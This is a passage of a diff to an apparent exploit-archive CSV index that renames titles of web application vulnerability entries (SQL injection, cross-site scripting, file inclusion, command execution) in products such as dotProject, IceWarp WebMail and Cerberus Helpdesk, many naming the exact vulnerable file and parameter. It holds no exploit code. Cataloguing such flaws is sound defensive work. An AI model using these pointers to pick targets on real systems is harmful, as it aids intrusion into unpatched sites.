Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 +26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - 'news_and_events_new.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp' p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 -26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 +26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php _load_article_details' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 -26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 -26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 -26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - getfile.php cat Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26977,platforms/php/webapps/26977.txt,"Dev Web Management System 1.5 - download_now.php target Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 - add.php Multiple Parameter Cross-Site Scripting",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html lang' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html Language' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html lang_settings' Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - 'addresses_export.php?queues' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - 'display_ticket_thread.php?ticket' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 +26977,platforms/php/webapps/26977.txt,"Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 +26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 - 'add.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,retrogod@aliceposta.it,php,webapps,0 +26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",php,webapps,0 +26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",php,webapps,0 +26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html?lang' Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0 40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0 @@ -29474,7 +29475,7 @@ id,file,description,date,author,platform,type,port 26988,platforms/php/webapps/26988.txt,"Dream4 Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 -26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 +26991,platforms/asp/webapps/26991.html,"Web Wiz (Multiple Products) - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 @@ -29485,20 +29486,20 @@ id,file,description,date,author,platform,type,port 27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals - PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - member.php Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action t Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 - Mail Action MID Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action HID Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps,0 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 -27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - modules.php Multiple Parameter Cross-Site Scripting",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - 'AdminName' Parameter SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 +27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - 'linkcategory.php?id' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - 'AdminName' SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 27019,platforms/php/webapps/27019.txt,"vBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 @@ -29510,16 +29511,16 @@ id,file,description,date,author,platform,type,port 27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - Invoices.php SQL Injection",2005-12-25,r0t3d3Vil,php,webapps,0 27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps,0 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp Press_Release_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp Service_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp Product_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp?Press_Release_ID' SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp?Service_ID' SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp?Product_ID' SQL Injection",2006-01-06,Preddy,asp,webapps,0 27037,platforms/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps,0 27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 -27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 +27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - 'dv_gbook.php?f' Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 @@ -29564,8 +29565,8 @@ id,file,description,date,author,platform,type,port 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 -27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 -27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 +27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 +27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0 @@ -29599,7 +29600,7 @@ id,file,description,date,author,platform,type,port 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - 'Loginout.php' Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 -27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,php,webapps,0 27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - index.php3 Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 @@ -29614,52 +29615,52 @@ id,file,description,date,author,platform,type,port 27170,platforms/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",php,webapps,0 27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 - Spip_RSS.php Remote Command Execution",2006-02-08,rgod,php,webapps,0 27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 - TYPE.php Cross-Site Scripting",2006-02-08,"James Bercegay",php,webapps,0 -27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - Archive.asp SQL Injection",2006-02-07,Dj_Eyes,asp,webapps,0 +27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,asp,webapps,0 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php' template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 -27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php contactgroupid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 -27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php folderid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps,0 27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Persistent Cross-Site Scripting",2013-07-29,drone,jsp,webapps,0 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0 27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0 27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0 -27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 -27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php path' Parameter Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 +27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php?path' Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 -27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 +27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - 'search.php?Q' Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 -27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php 'Username' Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 +27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 -27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - header.php Pagetitle Parameter Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 +27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - search.php Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 -27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 -27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple SQL Injections",2006-02-14,joffer,php,webapps,0 +27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 -27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 -27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 +27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-15,"Thomas Waldegger",php,webapps,0 +27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - 'private.php' Multiple SQL Injections",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29682,22 +29683,22 @@ id,file,description,date,author,platform,type,port 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0 27262,platforms/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Remote File Inclusion",2006-02-22,trueend5,php,webapps,0 -27263,platforms/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27264,platforms/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 News Module - Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27265,platforms/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27266,platforms/php/webapps/27266.txt,"Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 +27263,platforms/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 